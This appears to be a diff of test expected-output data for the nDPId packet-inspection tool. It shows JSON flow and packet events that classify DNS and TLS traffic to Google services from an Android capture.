+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454870649,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2dAAEAG9TTAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9uQgAAAgQFtAQCCAr\/\/zZYAAAAAAEDAwg="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454870996,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454870996,"pkt":"xiwDYGpkTGr2n\/YnCABFAABIq6dAAEARCZzAqAIQwKgCAY8FADUANFCq5z4BAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454870996,"flow_last_seen":1582454870996,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454870996,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": 
{"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454870998,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1582454870998,"pkt":"TGr2n\/YnxiwDYGpkCABFAABYgb0AAEARc3bAqAIBwKgCEAA1jwUARA+05z6BgAABAAEAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":201,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454870998,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871042,"flow_last_seen":1582454871042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871042,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1582454871042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871042,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA83wxAAEAGmY\/AqAIQ2O8meIDaAbu5DOmwAAAAAKAC\/\/8p0AAAAgQFtAQCCAr\/\/za8AAAAAAEDAwg="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -172,81 +173,81 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} 
-00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} 
-00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 